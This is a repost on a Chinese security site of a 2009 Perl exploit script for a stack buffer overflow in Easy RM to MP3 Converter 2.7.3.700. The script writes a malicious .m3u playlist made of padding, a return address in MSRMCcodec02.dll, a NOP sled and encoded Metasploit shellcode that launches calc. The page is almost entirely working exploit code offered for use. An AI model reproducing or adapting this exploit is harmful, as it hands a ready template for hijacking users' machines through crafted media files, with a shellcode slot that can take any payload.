首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Easy RM to MP3 Converter 2.7.3.700 (.m3u) Universal BOF Exploit
来源:www.sec-t.com 作者:Crazy_Hacker 发布时间:2009-07-17  

#!/usr/bin/perl
# Easy RM to MP3 Converter 2.7.3.700 (.m3u) File Universal Buffer Overflow Exploit
# Author: Crazy_Hacker
# Download :  http://www.rm-to-mp3.net/EasyRMtoMP3Converter.exe
# Tested : Windows XP SP2 (En)
# Greetz : Thugz_Hacker,Syrian Hacker,Golden_z3ro,Managerplay
# Home : www.sec-t.com
# viva Xhackers Team ;)
# welcome back Milw0rm

print "\n\n################################################## \n";
print "Exploit By : Crazy_Hacker \n";
print "Vurnable Pro : Easy RM to MP3 Converter 2.7.3.700 \n";
print "Tested on : Windows XP SP2 (En) \n";
print "Description : Stack Local Buffer Oveflow \n";
print "File type : .m3u \n";
print "################################################## \n";
$junk = "\x41" x 26061;
$ret = "\x0F\x3F\xA1\x01"; # => Universal Address (MSRMCcodec02.dll)
$nopsled = "\x90" x 20;
# windows/exec - 144 bytes   thanks to metasploit    Encoder: x86/shikata_ga_nai   EXITFUNC=seh, CMD=calc
$shellcode =
"\xdb\xdf\xbd\xe4\x47\x45\x20\xd9\x74\x24\xf4\x5f\x33\xc9" .
"\xb1\x1e\x83\xef\xfc\x31\x6f\x14\x03\x6f\xf0\xa5\xb0\xdc" .
"\x10\x6d\x3b\x1d\xe0\xe5\x7e\x21\x6b\x85\x85\x21\x6a\x99" .
"\x0d\x9e\x74\xee\x4d\x01\x85\x1b\x38\xca\xb1\x50\xba\x22" .
"\x88\xa6\x24\x16\x6e\xe6\x23\x60\xaf\x2d\xc6\x6f\xed\x59" .
"\x2d\x54\xa5\xb9\xca\xde\xa0\x49\x8d\x04\x2b\xa5\x54\xce" .
"\x27\x72\x12\x8f\x2b\x85\xcf\xbb\x4f\x0e\x0e\x57\xe6\x4c" .
"\x35\xa3\x3b\x33\x04\x5d\xdb\x9a\x02\x2a\x5d\x13\x40\x6c" .
"\x6d\xd8\x26\x71\xc0\x55\xae\x81\x93\x92\xac\x52\xc9\x32" .
"\xdb\xa2\x87\xb7\x44\x2b\x0f\x49\xf0\xa5\x78\x49\xe2\xd9" .
"\xe7\xd9\x8e\x1d";


$exploit = $junk.$ret.$nopsled.$shellcode;

print "\n[+] Creating Exploit File ...\n";
open($cc ,">Exploit.m3u");
print $cc $exploit;
close($cc);

print "[+] Exploit File Created (Exploit.m3u)\n";


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·MultiMedia Jukebox 4.0 Build 0
·MixSense 1.0.0.1 DJ Studio (.m
·Hamster Audio Player 0.3a Univ
·Mozilla Firefox 3.5 (Font tags
·Zortam MP3 Media Studio 9.40 M
·Easy RM to MP3 Converter .m3u
·Zortam MP3 Player 1.50 (m3u) I
·win32/xp sp2 (En) cmd.exe 23 b
·ZenPhoto Gallery 1.2.5 Admin P
·Streaming Audio Player 0.9 (sk
·webLeague 2.2.0 (Auth Bypass)
·htmldoc 1.8.27.1 (.html) Unive
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved